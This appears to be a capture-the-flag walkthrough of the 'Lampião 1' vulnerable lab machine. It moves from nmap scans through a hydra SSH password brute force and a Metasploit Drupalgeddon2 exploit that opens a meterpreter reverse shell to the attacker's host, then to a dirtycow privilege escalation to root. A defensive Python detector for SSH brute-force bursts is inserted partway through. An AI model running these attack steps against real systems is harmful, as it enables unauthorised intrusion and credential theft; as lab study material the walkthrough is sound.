Description: Would you like to keep hacking in your own lab?
Try this brand new vulnerable machine! "Lampião 1".
Get root!
Level: Easy
Information gathering

Find the target's address

```
nmap -sP 10.0.0.0/24
```

Output:

```
┌──(root㉿kali)-[~/100project/002]
└─# nmap -sP 10.0.0.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-26 13:54 CST
Nmap scan report for openwrt.lan (10.0.0.1)
Host is up (0.00048s latency).
MAC Address: 00:15:5D:80:01:00 (Microsoft)
Nmap scan report for PC-A.lan (10.0.0.2)
Host is up (0.00030s latency).
MAC Address: 00:15:5D:64:C0:00 (Microsoft)
Nmap scan report for 02.lan (10.0.0.102)
Host is up (0.00063s latency).
MAC Address: 00:0C:29:D0:3D:FF (VMware)
Nmap scan report for kali.lan (10.0.0.3)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.03 seconds
```
The target's IP is 10.0.0.102.

Scan the target's ports

```
nmap -p- 10.0.0.102
```

```
┌──(root㉿kali)-[~/100project/002]
└─# nmap -p- 10.0.0.102
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-26 13:56 CST
Nmap scan report for 02.lan (10.0.0.102)
Host is up (0.0025s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port
MAC Address: 00:0C:29:D0:3D:FF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.94 seconds
```
```
┌──(root㉿kali)-[~/100project/002]
└─# hydra -l tiago -P passwd.txt -o success.txt 10.0.0.102 -s 22 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-02 15:11:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 844 login tries (l:1/p:844), ~53 tries per task
[DATA] attacking ssh://10.0.0.102:22/
[22][ssh] host: 10.0.0.102   login: tiago   password: Virgulino
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-02 15:12:35
```
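On the defending side, a run like the one above leaves an obvious trace: a burst of `Failed password` entries from one source in a few seconds, followed by an `Accepted password` from the same source. The script below is an added example (not part of the original writeup) that detects that pattern in OpenSSH syslog output. The log lines it runs on are constructed for the example and the year is assumed to be 2022, since syslog timestamps carry none.

```python
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime

# Constructed sample auth.log lines (not taken from the original page).
# Lines 1-6: rapid failures from one source; line 7: success from that
# source; lines 8-9: one stray failure then a normal login from another host.
SAMPLE_LOG = """\
Sep  2 15:11:42 lampiao sshd[2101]: Failed password for tiago from 10.0.0.3 port 50210 ssh2
Sep  2 15:11:43 lampiao sshd[2103]: Failed password for tiago from 10.0.0.3 port 50212 ssh2
Sep  2 15:11:43 lampiao sshd[2105]: Failed password for invalid user admin from 10.0.0.3 port 50214 ssh2
Sep  2 15:11:44 lampiao sshd[2107]: Failed password for tiago from 10.0.0.3 port 50216 ssh2
Sep  2 15:11:45 lampiao sshd[2109]: Failed password for tiago from 10.0.0.3 port 50218 ssh2
Sep  2 15:11:46 lampiao sshd[2111]: Failed password for tiago from 10.0.0.3 port 50220 ssh2
Sep  2 15:12:35 lampiao sshd[2150]: Accepted password for tiago from 10.0.0.3 port 50300 ssh2
Sep  2 15:20:00 lampiao sshd[2200]: Failed password for tiago from 10.0.0.2 port 40000 ssh2
Sep  2 15:30:00 lampiao sshd[2210]: Accepted password for tiago from 10.0.0.2 port 40002 ssh2
"""

# Matches the two OpenSSH password-auth messages we care about.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


@dataclass
class AuthEvent:
    ts: datetime
    result: str  # "Failed" or "Accepted"
    user: str
    ip: str


def parse_auth_log(text: str, year: int = 2022) -> list[AuthEvent]:
    """Parse sshd password-auth lines; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps have no year; the caller supplies one (assumed).
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append(AuthEvent(ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(text: str, threshold: int = 5, window_seconds: int = 60,
                      year: int = 2022) -> list[dict]:
    """Flag a source IP once it reaches `threshold` failures inside a sliding
    window, and flag any later successful login from a flagged source."""
    failures: dict[str, deque] = defaultdict(deque)  # ip -> failure timestamps
    flagged: set[str] = set()
    alerts = []
    for ev in parse_auth_log(text, year):
        if ev.result == "Failed":
            q = failures[ev.ip]
            q.append(ev.ts)
            # Drop failures that fell out of the window.
            while q and (ev.ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ev.ip not in flagged:
                flagged.add(ev.ip)
                alerts.append({"type": "bruteforce", "ip": ev.ip,
                               "count": len(q), "at": ev.ts})
        elif ev.ip in flagged:
            # A success after a flagged burst is the high-priority signal:
            # the guessing most likely worked.
            alerts.append({"type": "success_after_bruteforce", "ip": ev.ip,
                           "user": ev.user, "at": ev.ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

Run it against `/var/log/auth.log` by reading the file into `detect_bruteforce`; on the sample it raises one `bruteforce` alert for 10.0.0.3 at the fifth failure and one `success_after_bruteforce` alert for the later login, while the single failure from 10.0.0.2 stays under the threshold. The flagged-source set persists for the whole log on purpose, so a success well after the burst still gets reported.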
```
---- Entering directory: http://10.0.0.102:1898/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.0.102:1898/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.0.102:1898/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.0.102:1898/profiles/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.0.102:1898/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.0.102:1898/sites/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.0.102:1898/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
```
```
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.3         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts http://10.0.0.102:1898/
rhosts => http://10.0.0.102:1898/
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.0.0.102
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.102:52034) at 2022-09-03 15:24:06 +0800
```
```
meterpreter > shell
Process 5701 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$ cd /tmp
cd /tmp
www-data@lampiao:/tmp$ ls
ls
40847.cpp  dcow  les.sh
www-data@lampiao:/tmp$ ./dcow
./dcow
Running ...
Received su prompt (Password: )
Root password is: dirtyCowFun
Enjoy! :-)
www-data@lampiao:/tmp$ su root
su root
Password: dirtyCowFun

root@lampiao:/tmp# cd /root
cd /root
root@lampiao:~# ls
ls
flag.txt
root@lampiao:~# cat f
cat flag.txt
9740616875908d91ddcdaa8aea3af366
root@lampiao:~#
```